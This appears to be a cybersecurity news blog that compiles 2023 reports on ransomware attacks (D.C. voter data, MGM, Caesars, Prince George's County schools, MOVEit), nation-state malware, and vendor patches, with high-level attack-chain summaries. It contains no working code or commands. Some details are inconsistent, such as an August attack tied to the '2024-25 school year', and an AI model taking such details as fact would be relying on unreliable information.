D.C. Voter Records Compromised by RansomVC: A Deep Dive

 Washington, D.C. is currently facing a significant cybersecurity threat as it grapples with the aftermath of a breach by the hacking group known as RansomVC, who have claimed responsibility for infiltrating the voter records of the nation's capital. This incident has raised serious concerns about the security of sensitive data and the potential implications for the democratic process.

Detailed Overview of the Breach

On October 5, the D.C. Board of Elections received a notification from the hacking group RansomVC, announcing their successful breach. RansomVC revealed that they had managed to access a vast trove of U.S. voter data, totaling approximately 600,000 lines of information, which also included records pertaining to D.C. voters. It is important to note that this breach was facilitated through the exploitation of DataNet Systems' web server. However, it is reassuring to know that the internal servers and databases of the Board of Elections themselves were not directly compromised.

While a substantial portion of the accessed data is part of the public record, the specific details of the information exposed have not been disclosed as of yet. The Board of Elections has pledged to provide a comprehensive breakdown once their internal review is concluded. Additionally, they are committed to reaching out to individuals whose data may have been compromised, ensuring transparency and accountability.

Impacted Records

The breach in question encompasses voter records spanning from August 9, 2019, to January 25, 2022. This dataset includes information related to voters engaged in the canvass process, which takes place every odd-numbered year to maintain an up-to-date voter roll. The Board has assured the affected individuals that they will be promptly informed of any potential risks.

Ongoing Investigation

The Board of Elections is not navigating this crisis in isolation. They have enlisted the assistance of the Multi-State Information Sharing and Analysis Center's Computer Incident Response Team, as well as support from the FBI and the Department of Homeland Security, among others. These collaborative efforts are geared towards unearthing the root causes of this breach and implementing measures to prevent future occurrences.

Voter Registration Remains Secure

Despite the ongoing investigation and the continued operation of the Board of Elections website, the residents of D.C. can rest assured that they can still register to vote without compromising their personal information. Officials have confirmed that the online registration process, as well as traditional paper and in-person methods, remain secure and unaffected.

In Conclusion

The breach of Washington, D.C.'s voter data serves as a stark reminder of the ever-evolving threats in the digital age. As the investigation proceeds, stakeholders and residents alike eagerly await further details and reassurances regarding data security. The incident underscores the critical importance of safeguarding sensitive information in an era where cybersecurity threats are a constant concern.

IMPORTANT: On 10/5, DCBOE became aware of cybersecurity incident involving DC voter records. While the incident remains under investigation, DCBOE’s internal databases & servers were not compromised. Our full statement is pictured below & will be available on our website soon. pic.twitter.com/VCuhXOJLqK

— DC Board of Elections (@Vote4DC) October 6, 2023

Caesars Entertainment Cyberattack Exposes 6TB of Stolen Data

 Caesars Entertainment Inc. has reportedly paid a substantial sum to hackers who successfully infiltrated the company's systems and issued threats to expose sensitive data.
This breach comes in the wake of another cyberattack on MGM Resorts International. Although Caesars Entertainment has not officially commented on the situation, the cyberattack became publicly known after Bloomberg News initially reported it. Interestingly, this revelation had a minimal impact on the company's stock, with shares remaining relatively stable.

The hacking group allegedly responsible for this attack is known as Scattered Spider or UNC 3944. They have gained recognition for their expertise in social engineering tactics, which they employ to gain access to corporate networks. In the case of Caesars, the hackers initially breached an external IT vendor before infiltrating the company's network.
The timeline of the attack suggests that Caesars may have been targeted as early as August 27. Notably, some members of this hacking group are believed to be relatively young, with individuals as young as 19 years old, residing in the US and the UK.
The attackers successfully obtained sensitive data from Caesars' loyalty program members, including driver's licenses and social security numbers, as confirmed by the company in their regulatory filing.
Traditionally, hacking groups demand cryptocurrency as ransom in exchange for stolen data. Some employ ransomware tactics to encrypt computer files, providing decryption keys only after receiving payment. In recent cases, hackers have chosen to steal data and demand payment, with the threat of publishing the information if their demands are not met.
Caesars has stated that they have taken measures to ensure that unauthorized actors delete the stolen data, although they cannot provide a guarantee of this outcome.

ALPHV/BlackCat Hackers: MGM Resorts Breach Unveiled – Compromised in Mere 10 Minutes

In a recent cyber incident, the ALPHV/BlackCat ransomware group has taken responsibility for causing disruptions at MGM Resorts. Their method involved gaining an employee's trust via a phone call, a process that reportedly took only 10 minutes to execute.

The ALPHV ransomware group outlined their approach, stating, "All ALPHV ransomware group did to compromise MGM Resorts was to connect on LinkedIn, identify an employee, and then call the Help Desk." The consequences of this breach have been felt by MGM Resorts, with customers experiencing disruptions, particularly with slot machines at their casinos on the Las Vegas Strip.

 As of Wednesday morning, the company is still grappling with downtime issues, including website disruptions. While MGM Resorts has not officially commented on the situation, they did mention on Tuesday that their resorts, including dining, entertainment, and gaming, remain operational.

The ALPHV ransomware group is known in the cybersecurity community for its expertise in social engineering tactics to gain initial access. Subsequently, they often employ ransomware schemes to pressure their targets into paying a ransom. As evidenced by their data leak sites, they have previously targeted major corporations, including beauty giant Estée Lauder.

MGM Resorts confirmed the cyber incident on Monday, acknowledging that it impacted various systems across its suite of casinos. While the company took swift action to protect its systems and data, including shutting down certain systems, specific details regarding the extent of the shutdown and affected systems have not been officially disclosed. Customer reports suggest issues with reservations, ATM usage, certain games, and mobile key entry into hotel rooms.

MGM Resorts has recently provided an update regarding its current operational status. They have announced that their dining, entertainment, and gaming facilities are fully operational and available for guests to enjoy. This is great news for anyone planning a visit to MGM Resorts, as they can be assured that they will have access to a wide range of amenities and activities during their stay.

Rhysida Ransomware Group Claims Responsibility for Prince George's County School Cyberattack

 The recently established Rhysida ransomware group has claimed responsibility for the cyberattack on Maryland's Prince George's County school systems that occurred on. August 14th, targeting one of the largest school districts in the United States.
This ransom group included the Maryland school district in its dark leak site on the Friday just preceding the commencement of the 2024-25 school year, a mere three days away.

Prince George's County Public School System (PGCPS), ranking as one of the nation's 20 largest school districts, fell victim to a cyberattack in the early hours of August 14th.
Although the district reported that only approximately 4,500 user accounts out of 180,000 were affected, primarily staff accounts, it now appears that sensitive data from these compromised user accounts has surfaced on Rhysida's leak site, with a price tag of 15 Bitcoin or approximately $390,000 USD.
Rhysida seems to be auctioning off a substantial volume of stolen data from the breach, including passports, driver's licenses, and other sensitive information; however, they have not disclosed a specific quantity. The auction is set to conclude six days from the initial listing on Friday, as indicated by the countdown clock displayed on PGCPS. The district had been posting updates about the network outage on its website, with the latest update from August 18th preceding Rhysida's claim of responsibility.

In response to the situation, PGCPS has stated, "Prince George's County Public Schools (PGCPS), with the assistance of cybersecurity experts, continues to thoroughly investigate the cyberattack that disrupted our servers...We are now focused on completely restoring our technology environment and analyzing the scope of the event to determine any current and future data loss."
"While we are currently unaware of any specific misuse of information, cyber-attacks of this nature typically result in a breach of data. We will provide updates as needed," the district added.
Simultaneously, on its dark leak site, Rhysida posted the following alongside PGCPS data samples: "With just seven days on the clock, seize the opportunity to bid on exclusive, unique, and impressive data. Open your wallets and be ready to buy exclusive data."
"We sell only to one hand, no reselling, you will be the only owner!" the group asserted. 
Shortly after becoming aware of the breach, PGCPS urged all system users to reset their passwords as a precautionary measure. Students will also be required to reset their passwords during the first week of school, commencing on August 28th, although the district stated that its primary business and student information systems did not appear to be impacted by the incident.
Furthermore, PGCPS expressed its commitment to reach out to any affected victims in the coming days.

Situated in the Washington DC Corridor, the Prince George County school district boasts more than 200 schools and centers, serving over 133,000 students and employing nearly 20,000 staff members, as stated on its website.
Rhysida's Ongoing Activities: This relatively lesser-known threat actor has been on the ransomware scene since late May, according to US government officials who profiled the group earlier this month.
Earlier this week, Rhysida claimed responsibility for a crippling attack on the California-based healthcare conglomerate Prospect Medical Holdings (PMH), which occurred on August 3rd. This ransom attack forced several hospitals and medical facilities in Connecticut and Pennsylvania to suspend services and divert patients for several days.
PMH's subsidiaries include 17 hospitals and 165 outpatient facilities across five states, including Rhode Island and New Jersey.
In addition to adding PMH as a victim on their dark leak site, the threat actor set up a live auction offering over 2.3 terabytes of sensitive data, allegedly stolen in that attack, including an entire SQL database.

Another victim, Washington State's Pierce College, has also fallen prey to Rhysida, with the gang allegedly selling the school's stolen data starting at 10 Bitcoin to the highest bidder. This auction is scheduled to conclude on Monday.
Rhysida's leak site lists 40 other victims, nearly three times the number of victims indicated in the US officials' warning bulletin about the group on August 4th.
Rhysida is believed to have connections to the Vice Society ransom gang, notorious for its attacks on the education sector, primarily in the US, Canada, and the UK.

Exclusive: US Government Agencies Targeted in Global Cyberattack

 According to a leading US cybersecurity agency, several US federal government agencies have fallen victim to a global cyberattack orchestrated by Russian cybercriminals who exploit a vulnerability in widely used software. The US Cybersecurity and Infrastructure Security Agency (CISA) is offering assistance to multiple federal agencies affected by intrusions in their MOVE it applications, as stated by Eric Goldstein, the agency's executive assistant director for cybersecurity. Efforts are underway to understand the extent of the impact and implement timely remediation.
Beyond US government agencies, "several hundred" US companies and organizations could also be impacted by this hacking spree, as estimated by a senior CISA official, referencing private experts' assessments.

The ransomware gang believed to be responsible, known as Clop, has a reputation for demanding multimillion-dollar ransoms. However, no ransom demands have been made to federal agencies, according to the senior official's background briefing.
IN response, CISA's actions coincide with Progress Software, the US company responsible for the exploited software, reporting the discovery of a second vulnerability in the code, which is currently being addressed.
The Department of Energy, confirmed by a spokesperson, is among the multiple federal agencies breached in this ongoing global hacking campaign. CISA Director Jen Easterly stated that these hacks have not significantly impacted federal civilian agencies, adding that the hackers have been primarily opportunistic in exploiting the software flaw to infiltrate networks.
This news adds to the growing list of victims affected by an extensive hacking campaign that commenced two weeks ago, targeting major US universities and state governments. The relentless wave of cyberattacks puts pressure on federal officials who have pledged to combat the scourge of ransomware attacks that have paralyzed schools, hospitals, and local governments across the country.
Since late last month, the hackers have exploited a vulnerability in the widely used MOVE it software, commonly employed by companies and agencies for data transfer. Progress Software revealed a new vulnerability in the software that could be exploited by malicious actors, subsequently prompting the company to take MOVE it Cloud offline while urgently addressing the issue.
Agencies were quick to deny being affected by the hack, while the Transportation Security Administration and the State Department confirmed they were not victims. The Department of Energy took immediate action to mitigate the hack's impact upon discovering that records from two department entities were compromised. The department is working with law enforcement, CISA, and the affected entities to investigate the incident and mitigate the breach's consequences.
The Department of Energy victims include Oak Ridge Associated Universities, a not-for-profit research center, and a contractor affiliated with the department's Waste Isolation Pilot Plant in New Mexico, responsible for disposing of atomic energy-related waste.
Johns Hopkins University and its renowned health system reported that sensitive personal and financial information, including health billing records, may have been stolen in the hack. Additionally, Georgia's state-wide university system, encompassing the University of Georgia and other state colleges and universities, is investigating the scope and severity of the breach.
Although CLOP initially claimed responsibility for some of the hacks, which affected BBC employees, British Airways, Shell, and state governments in Minnesota and Illinois, among others, it remains uncertain if other groups now have access to the necessary software code to carry out attacks.
The CLOP ransomware group set a deadline for victims to contact them regarding ransom payment, after which they began listing additional alleged victims on their extortion site on the dark web. As of Thursday morning, no US federal agencies were listed on the dark website. Instead, the hackers boldly stated, "If you are a government, city, or police service, do not worry, we erased all your data. You do not need to contact us. We have no interest in exposing such information."
Source:CNN

Chinese Hackers Unleash Unprecedented Tactics for Critical Infrastructure Attacks

 

A Chinese nation-state actor known as Volt Typhoon has been discovered using never-before-seen techniques to target critical infrastructure. CrowdStrike, the cybersecurity company tracking the adversary under the name Vanguard Panda, revealed that the hacking group has been active since mid-2020 and employs unique tradecraft to maintain remote access to their targets.

According to CrowdStrike, Volt Typhoon consistently exploits ManageEngine Self-service Plus vulnerabilities to gain initial access. They then utilize custom web shells for persistent access and employ living-off-the-land (LotL) techniques for lateral movement within the compromised systems.

Volt Typhoon, also known as Bronze Silhouette, is a cyber espionage group from China that has previously targeted the U.S. government, defense organizations, and critical infrastructure entities.

This adversary relies on credentials and living-off-the-land techniques to remain stealthy and swiftly navigate through targeted environments," said Tom Etheridge, Chief Global Professional Services Officer at CrowdStrike, in an interview with The Hacker News. Analysis of the group's modus operandi reveals a strong focus on operational security, utilizing a wide range of open-source tools against a select number of victims to carry out long-term malicious activities.

The group has been described as one that "prefers web shells for persistence and relies on short bursts of activity primarily involving living-off-the-land binaries to achieve its objectives."

In one unsuccessful incident targeting an undisclosed customer, Volt Typhoon exploited the Zoho ManageEngine ADSelfService Plus service running on an Apache Tomcat server. They executed suspicious commands related to process enumeration and network connectivity. CrowdStrike noted that the attacker displayed familiarity with the target environment, executing rapid commands and having specific internal hostnames, IP addresses, remote shares, and plaintext credentials.

Further investigation of the Tomcat access logs unveiled multiple HTTP POST requests to /html/promotion/selfsdp.jspx, which is a web shell disguised as a legitimate identity security solution to evade detection. The deployment of this web shell occurred approximately six months prior to the hands-on-keyboard activity, indicating extensive reconnaissance of the target network.

The exact method used by Vanguard Panda to breach the ManageEngine environment remains unclear, but evidence suggests the exploitation of CVE-2021-40539, a critical authentication bypass flaw leading to remote code execution. The threat actor attempted to delete artifacts and tamper with access logs to obscure the forensic trail. However, they overlooked Java source and compiled class files generated during the attack, leading to the discovery of additional web shells and backdoors. 

One of these backdoors is a JSP file likely obtained from an external server. It backdoors "tomcat-websocket.jar" by utilizing a remotely fetched ancillary JAR file called "tomcat-ant.jar" through a web shell. Cleanup actions are performed to conceal the attack.

The trojanized version of tomcat-websocket.jar contains three new Java classes (A, B, and C). A.class acts as another web shell capable of receiving and executing Base64-encoded and AES-encrypted commands.

"The use of a backdoored Apache Tomcat library is a previously undisclosed persistence TTP [tactics, techniques, and procedures] in use by Vanguard Panda," stated CrowdStrike. They expressed moderate confidence that the implant serves to "enable persistent access to high-value targets after the initial access phase of operations using zero-day vulnerabilities."

Etheridge emphasized that Vanguard Panda had an advanced understanding of the victim's environment, indicating their persistence and ability to evade detection during reconnaissance efforts. He added, "Additionally, it moved evidence, covering their tracks as they moved deeper into the victim's infrastructure."

Implementing robust security measures, patch management, and comprehensive logging is crucial to protect against such advanced threat actors.

Proxyjacking Campaign: Cybercriminals Targeting Vulnerable SSH Servers

 

A new financially motivated campaign has emerged, with cybercriminals actively hijacking vulnerable SSH servers to create a covert proxy network.

In this campaign, attackers exploit SSH for remote access, running malicious scripts that secretly enroll victim servers into a peer-to-peer (P2P) proxy network such as Peer2Profit or Honeygain, as reported by Akamai researcher Allen West.Unlike cryptojacking, where compromised systems are used for unauthorized cryptocurrency mining, proxyjacking allows threat actors to utilize the victim's unused bandwidth to operate various services as a P2P node.

This approach offers dual benefits: it enables the attacker to monetize the surplus bandwidth with significantly reduced resource usage compared to cryptojacking, while also minimizing the risk of detection. "It is a stealthier alternative to cryptojacking and poses serious implications that amplify the challenges of proxied Layer 7 attacks," explains West.

The use of proxyware services for anonymity can be a double-edged sword, as malicious actors can exploit them to obfuscate the origin of their attacks by routing traffic through intermediary nodes.  

Akamai, which discovered this campaign on June 8, 2023, reveals that the activity aims to breach vulnerable SSH servers and deploy an obfuscated Bash script. This script fetches necessary dependencies from a compromised web server, including the camouflaged curl command-line tool disguised as a CSS file ("csdark.css").

The stealthy script also actively terminates competing instances of bandwidth-sharing programs before launching Docker services that leverage the victim's bandwidth for financial gains.

Further investigation of the web server hosting the campaign uncovered the presence of a cryptocurrency miner, indicating that the threat actors are involved in both cryptojacking and proxyjacking attacks. While proxyware itself is not necessarily malicious, Akamai warns that "some of these companies fail to properly verify the sourcing of IPs in the network and occasionally encourage users to install the software on their work computers."

However, when installed without users' knowledge or consent, these operations can cross into the realm of cybercrime, allowing threat actors to control multiple systems and generate illicit revenue.

"Old techniques remain effective, especially when paired with new outcomes," notes West. "Implementing standard security practices, including strong passwords, patch management, and comprehensive logging, remains crucial for effective prevention."

African Nations Face Escalating Phishing & Compromised Password Cyberattacks: Report

 

In 2022, cyberattacks targeting large enterprises in African nations witnessed a significant surge. Kenyan businesses reported an 82% increase in these attacks, while South African and Zambian businesses experienced a 62% increase each.
According to a report by pan-African technology group Liquid C2, the primary method of attack was through phishing or spam attacks, accounting for 61% of incidents. Another 48% of attacks exploited compromised passwords.
Jess Parnell, the Vice President of Security Operations at Centripetal, suggests that cyber attackers might be focusing on businesses in Kenya, South Africa, and Zambia due to their emerging economies and expanding business sectors. These countries are seen as attractive targets for financial gain through activities like data theft, ransomware attacks, and financial fraud.

Anna Collard, a security evangelist at KnowBe4 Africa, believes that most attacks are still primarily opportunistic, with ransomware groups targeting compromised networks and credentials obtained from access brokers. However, she acknowledges that the targeting of emerging economies is influenced by the desire to avoid retaliation from the US. This makes Southern Africa and other economies with high cyber-dependency on the continent appealing targets.

Africa Witnessing Increased Hiring for Cybersecurity Professionals
The Liquid C2 report highlights a growing gap of 100,000 certified cybersecurity professionals in Africa. Despite this, all respondents in the report mentioned significant advancements in their cloud and digital strategies, as well as related cybersecurity capabilities.
Moreover, 68% of the respondents stated that they had hired cybersecurity staff or enlisted the services of a cybersecurity team in the past year. Kenya had the highest percentage at 82%, followed by South Africa at 63%, and Zambia at 62%.
Parnell emphasizes that the persistence of attacks, despite increased staffing and cybersecurity investments, suggests that investing in cybersecurity measures alone does not guarantee protection against threats. He stresses the importance of a proactive approach to threat intelligence-powered cybersecurity, continuously updating defenses to mitigate risks.
Defending against cyberattacks requires a multi-layered approach, including implementing robust security measures, raising employee awareness about common attack vectors like phishing, regular software and system updates, vulnerability assessments, and prompt response to security incidents. Prioritizing cybersecurity and proactive measures can help businesses defend against attacks and minimize the impact of successful breaches.
Klaus Schenk, Senior Vice President of Security and Threat Research at Verimatrix, cautions that increasing cybersecurity staff may attract malicious actors seeking challenges or opportunities to demonstrate their skills. However, he states that the benefits outweigh the risks, as augmenting the cybersecurity team can significantly mitigate the impact of cyberattacks.
The ultimate goal should be to minimize the occurrence of such attacks and strive for a state where they have no impact whatsoever, Schenk concludes.

CISA Adds Samsung Phone Flaws to 'Must Patch' List, Likely Exploited by Spyware Vendor

 
The US Cybersecurity and Infrastructure Security Agency (CISA) has included several vulnerabilities affecting Samsung smartphones in its Known Exploited Vulnerabilities Catalog. It is highly likely that these flaws have been exploited by a commercial spyware vendor.
CISA updated its catalog with eight new vulnerabilities, including two vulnerabilities in D-Link routers and access points that were exploited by a Mirai botnet variant. The remaining six vulnerabilities impact Samsung mobile devices, and they were all addressed by Samsung through patches released in 2021.
Among the vulnerabilities is CVE-2021-25487, an out-of-bounds read issue in the modem interface driver that can lead to arbitrary code execution. This vulnerability was fixed by Samsung in October 2021. Although Samsung has classified it as moderate, its severity is considered high according to the CVSS score.
Another vulnerability addressed in the same October 2021 patch batch is CVE-2021-25489, a low-severity format string bug in the modem interface driver that can result in a Denial-of-Service (DoS) condition.

CISA also included moderate-severity vulnerabilities CVE-2021-25394 and CVE-2021-25395, which are use-after-free bugs in the MFC charger driver. Samsung resolved these issues in May 2021.
The remaining two vulnerabilities are CVE-2021-25371, a moderate-severity flaw that allows an attacker to load arbitrary ELF files inside the DSP driver, and CVE-2021-25372, a moderate-severity out-of-bounds access vulnerability in the same driver. Samsung patched both vulnerabilities in March 2021.

It is worth noting that Samsung has not updated its old advisories to warn users about the exploitation of these vulnerabilities.

While there are no public reports of exploitation for the Samsung mobile device vulnerabilities added to CISA's 'must-patch' list, it is highly likely that a commercial spyware vendor has already taken advantage of them.

In November 2022, Google disclosed three similar Samsung phone vulnerabilities with 2021 CVEs that were exploited by an unnamed spyware vendor against Android devices, even when they were considered zero-day vulnerabilities. These three vulnerabilities were patched in March 2021. Google has also indicated that it was aware of several other Samsung vulnerabilities with 2021 CVEs that had been exploited in attacks.

This suggests that the vulnerabilities added to CISA's catalog this week have also been exploited by spyware vendors, with Google monitoring their activities. SecurityWeek has reached out to Google for confirmation on this matter.

Related: Google Links Exploitation Frameworks to Spanish Spyware Vendor Variston

Related: New Samsung Message Guard Protects Mobile Devices Against Zero-Click Exploits

Related: Android Security Update Patches Kernel Vulnerability Exploited by Spyware Vendor

WhatsApp Enhances Proxy Feature to Counter Internet Shutdowns

 

Meta's WhatsApp has recently introduced updates to its proxy feature, expanding the range of content that can be shared within conversations. The messaging service now allows users to send and receive images, voice notes, files, stickers, and GIFs, as confirmed by WhatsApp in a statement to The Hacker News. These new features were initially reported by BBC Persian.
The latest improvements include simplified setup steps to streamline the process, along with the introduction of shareable links. These links enable users to easily share functioning proxy addresses with their contacts, facilitating automatic installation.
Proxy server support was officially launched by WhatsApp in January, providing users with a means to bypass government-imposed censorship and internet shutdowns. By utilizing proxy servers, users can indirectly access WhatsApp even in regions where access is restricted.

To assist users in setting up their proxy servers, WhatsApp has made available a reference implementation. This implementation allows users to create a proxy server with ports 80, 443, or 5222 and a domain name that directs to the server's IP address.
"A proxy server acts as an intermediary gateway between WhatsApp and external servers," explained WhatsApp. "Users can search for trusted accounts on social media that regularly share verified proxy addresses, which can then be added to their WhatsApp accounts."
Internet shutdowns have become increasingly prevalent worldwide during times of crises, conflicts, communal violence, and even to prevent cheating in exams. In 2022, authorities in 35 countries implemented internet shutdowns a total of 187 times. Alarmingly, within the first five months of 2023, this number has already reached 80.
India, in particular, accounted for 84 shutdowns in 2022, maintaining its position as the leading democratic country enforcing deliberate internet restrictions for the fifth consecutive year.

Unveiling The Latest Iranian Hacker’s Espionage Tactics: POWERSTAR Backdoor.

Charming Kitten, a notorious nation-state actor linked to Iran's Islamic Revolutionary Guard Corps (IRGC), has recently surfaced in a targeted spear-phishing campaign utilizing an updated version of their potent PowerShell backdoor called POWERSTAR.

Volexity researchers, Ankur Saini and Charlie Gardner, revealed in a recent report the implementation of enhanced operational security measures within the malware. These measures pose significant challenges for analysts attempting to analyze and gather intelligence on the threat.

Renowned for their expertise in social engineering, Charming Kitten employs various tactics to deceive their targets. Crafted personas on social media platforms, sustained conversations to establish rapport, and the subsequent delivery of malicious links are among their primary methods. The group is also recognized by multiple names, including APT35, Cobalt Illusion, Mint Sandstorm (formerly Phosphorus), and Yellow Garuda.

In addition to POWERSTAR, recent Charming Kitten intrusions have featured other implants like PowerLess and BellaCiao, indicating a wide array of espionage tools at their disposal to achieve strategic objectives.

Initially exposed by Check Point in January 2022, POWERSTAR (also known as CharmPower) was publicly documented in connection with attacks exploiting Log4Shell vulnerabilities in publicly exposed Java applications. Since then, the backdoor has been employed in at least two other campaigns, as detailed by PwC in July 2022 and Microsoft in April 2023.

Volexity, which previously detected a rudimentary variant of POWERSTAR in 2021 distributed through a malicious macro in a DOCM file, now reports that the May 2023 attack wave utilizes an LNK file within a password-protected RAR archive to download the backdoor from Backblaze. Furthermore, Charming Kitten has taken measures to impede analysis during this attack.

"With POWERSTAR, Charming Kitten aimed to reduce the risk of malware exposure, analysis, and detection by delivering the decryption method separately from the initial code without writing it to disk," stated the researchers.

This approach provides an operational safeguard, as decoupling the decryption method from the command-and-control (C2) server prevents future successful decryption of the corresponding POWERSTAR payload.

POWERSTAR boasts an extensive range of features, empowering it to execute PowerShell and C# commands remotely, establish persistence, gather system information, and download additional modules. These modules allow the backdoor to enumerate running processes, capture screenshots, search for files matching specific extensions, and monitor the integrity of persistence components.

Significant improvements and expansions have been made to the cleanup module, designed to eradicate any traces of the malware's presence and eliminate persistence-related registry keys. These enhancements underscore Charming Kitten's ongoing efforts to refine their techniques and evade detection. Volexity also discovered a distinct variant of POWERSTAR that employs a decentralized InterPlanetary Filesystem (IPFS) to retrieve a hard-coded C2 server, enhancing the group's attack infrastructure resilience.

Coinciding with this development, MuddyWater (aka Static Kitten) has employed an undocumented command-and-control (C2) framework known as PhonyC2 to distribute malicious payloads to compromised hosts.

"The phishing playbook utilized by Charming Kitten and the overall purpose of POWERSTAR remain consistent," stated the researchers. "References to persistence mechanisms and executable payloads within the POWERSTAR Cleanup module strongly indicate a broader set of tools utilized by Charming Kitten for conducting malware-enabled espionage."

Stay informed about the evolving techniques employed by Charming Kitten and gain valuable insights into countering state-sponsored cyber espionage by regularly visiting our cybersecurity blog. Our experts provide comprehensive coverage, analysis, and effective mitigation strategies to safeguard your organization against these sophisticated threats.

 

Apple Releases Security Patches for Actively Exploited Flaws in iOS, macOS, and Safari

 

Apple has taken prompt action to address a set of vulnerabilities that were actively exploited in the wild. The updates released by Apple cover iOS, iPadOS, macOS, watchOS, and the Safari browser. Among the vulnerabilities are a pair of zero-days associated with a mobile surveillance campaign known as Operation Triangulation, which has been active since 2019. Apple acknowledges that these issues have been exploited and urges users to update their devices immediately.

Details of the Exploited Flaws: The identified vulnerabilities include:

CVE-2023-32434: An integer overflow vulnerability in the Kernel that could allow a malicious app to execute arbitrary code with kernel privileges.

CVE-2023-32435: A memory corruption vulnerability in WebKit that could lead to arbitrary code execution when processing specially crafted web content.

Apple acknowledges that these vulnerabilities may have been exploited in versions of iOS released prior to iOS 15.7. The discovery of these flaws is credited to Kaspersky researchers Georgy Kucherin, Leonid Bezvershenko, and Boris Larin.

Description of Operation Triangulation: Kaspersky has analyzed the spyware implant used in a zero-click attack campaign targeting iOS devices. The attack involves exploiting a remote code execution vulnerability through iMessages. The implant, named TriangleDB, operates in memory, leaving no traces after a device reboot. It carries out various data collection and tracking activities, including interacting with the device's file system, managing processes, extracting keychain items for gathering credentials, and monitoring geolocation.

Additional Zero-Day and Patch: Apple has also addressed another zero-day vulnerability, CVE-2023-32439, which was reported anonymously. This flaw could result in arbitrary code execution when processing malicious web content. The update includes improved checks to mitigate this type confusion issue.

Devices and Platforms Affected: The updates are available for the following platforms:

iOS 16.5.1 and iPadOS 16.5.1: iPhone 8 and later, various iPad models

iOS 15.7.7 and iPadOS 15.7.7: iPhone 6s, iPhone 7, iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), iPod touch (7th generation)

macOS Ventura 13.4.1, macOS Monterey 12.6.7, and macOS Big Sur 11.7.8

watchOS 9.5.2: Apple Watch Series 4 and later

watchOS 8.8.1: Apple Watch Series 3, 4, 5, 6, 7, and SE

Safari 16.5.1: Macs running macOS Monterey

Apple's Ongoing Security Efforts: With these latest fixes, Apple has addressed a total of nine zero-day vulnerabilities in its products since the beginning of the year. The company has demonstrated its commitment to swiftly patching identified security flaws, strengthening its overall security posture.

Conclusion: Apple's release of updates to address actively exploited vulnerabilities underscores the importance of promptly updating devices to protect against potential attacks. Users are urged to install the provided patches and stay vigilant regarding future security updates. Apple's ongoing efforts to address vulnerabilities contribute to a safer digital ecosystem for its users.

Asus Issues Urgent Firmware Updates to Address WiFi Router Vulnerabilities

 

Taiwanese computer hardware manufacturer Asus has released critical firmware updates for its WiFi router product lines to address security vulnerabilities. The company warns users about the potential risk of remote code execution attacks and advises taking immediate action.

Vulnerabilities and Fixes: Asus has identified at least nine security defects and multiple weaknesses in its routers that could lead to code execution, denial-of-service, information disclosure, and authentication bypasses. One of the most severe vulnerabilities, with a CVSS severity rating of 9.8/10, dates back to 2018 and exposes routers to code execution attacks.

The specific vulnerability, known as CVE-2018-1160, involves a memory corruption issue in Netatalk before version 3.1.12. According to the advisory, the lack of bounds checking on attacker-controlled data enables remote unauthenticated attackers to execute arbitrary code.

In addition, Asus has addressed CVE-2022-26376 (CVSS 9.8/10), a memory corruption vulnerability in the httpd unescape functionality of Asuswrt prior to version 3.0.0.4.386_48706 and Asuswrt-Merlin New Gen prior to version 386.7. This vulnerability can be triggered by a specially-crafted HTTP request, leading to memory corruption.

Affected Routers and Recommendations: Asus has provided a list of affected WiFi routers, including models such as Asus GT6, GT-AXE16000, GT-AX11000 PRO, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000, and TUF-AX5400.

To mitigate the risks, Asus advises users who choose not to install the new firmware version to disable services accessible from the WAN side. This includes remote access from WAN, port forwarding, DDNS, VPN server, DMZ, and port trigger. The company strongly recommends periodically auditing both equipment and security procedures to enhance protection against malware attacks targeting router infrastructure. Users are also urged to update their routers to the latest firmware and set up separate passwords for wireless networks and router-administration pages.

Conclusion: Asus has taken swift action by releasing urgent firmware updates to address security vulnerabilities in its WiFi routers. Users are encouraged to promptly install the updates and follow the recommended security measures to safeguard their router infrastructure and protect against potential attacks.

MULTI#STORM Campaign: Phishing Attacks Deploy Remote Access Trojans in India and the U.S.

 

A new phishing campaign named MULTI#STORM has emerged, targeting India and the U.S. This campaign employs JavaScript files to deliver remote access trojans (RATs) on compromised systems, leading to potential data breaches and unauthorized access.

Attack Details: According to researchers at Securonix, the attack chain of MULTI#STORM involves infecting victim machines with multiple unique RAT malware instances, such as Warzone RAT and Quasar RAT, which serve as command-and-control tools during various stages of the attack.

The attack begins with an email containing a link to a password-protected ZIP file named "REQUEST.zip," hosted on Microsoft OneDrive. The password for the ZIP file is set as "12345." Upon extracting the archive, a heavily obfuscated JavaScript file named "REQUEST.js" is revealed. Executing this file triggers the infection process by running two PowerShell commands. These commands retrieve separate payloads from OneDrive and execute them.

The first payload is a decoy PDF document presented to the victim, while the second payload is a Python-based executable that runs silently in the background. This binary acts as a dropper, extracting and executing the main payload, encoded as Base64 strings, named "Storm.exe." Additionally, the dropper establishes persistence by modifying the Windows Registry.

The binary also decodes a second ZIP file, "files.zip," containing four different files. These files are designed to bypass User Account Control (UAC) and escalate privileges by creating simulated trusted directories. One of these files, named "check.bat," bears similarities to another loader called DBatLoader despite using a different programming language.

Another file, "KDECO.bat," executes a PowerShell command to instruct Microsoft Defender to add an antivirus exclusion rule, bypassing the scanning of the "C:\Users" directory. The final stage of the attack involves deploying Warzone RAT (also known as Ave Maria), a readily available malware sold for $38 per month. Warzone RAT provides extensive capabilities for data exfiltration and downloading additional malware, such as Quasar RAT.

Conclusion: To protect against phishing attacks like MULTI#STORM, users must exercise heightened vigilance, especially when encountering emails that create a sense of urgency. It is crucial to avoid directly executing JavaScript files and remain cautious of shortcut files or those using double extensions, as they may have a higher success rate in exploiting unsuspecting victims.

New Version of Android GravityRAT Steals WhatsApp Backup Files

 

An updated variant of the Android GravityRAT malware has been discovered, targeting users through the BingeChat and Chatico messaging apps since August 2022. While the BingeChat campaign is still active, the Chatico campaign has ceased.
Attribution and Targeting: Researchers from ESET have associated the GravityRAT campaign with a group named SpaceCobra, although the actors behind the malware remain unidentified. The threat actor is believed to have connections to Pakistan and has previously targeted military personnel in India.

Campaign Overview: The malicious BingeChat app, distributed through the "bingechat[.]net" domain and potentially other channels, masquerades as a modified version of OMEMO IM—an authentic open-source instant messaging app for Android. The registration process for the malicious app is invite-based, requiring victims to provide valid credentials within a specified timeframe. Upon successful registration, BingeChat requests access to various permissions, including contacts, location, phone, SMS, storage, call logs, camera, and microphone.

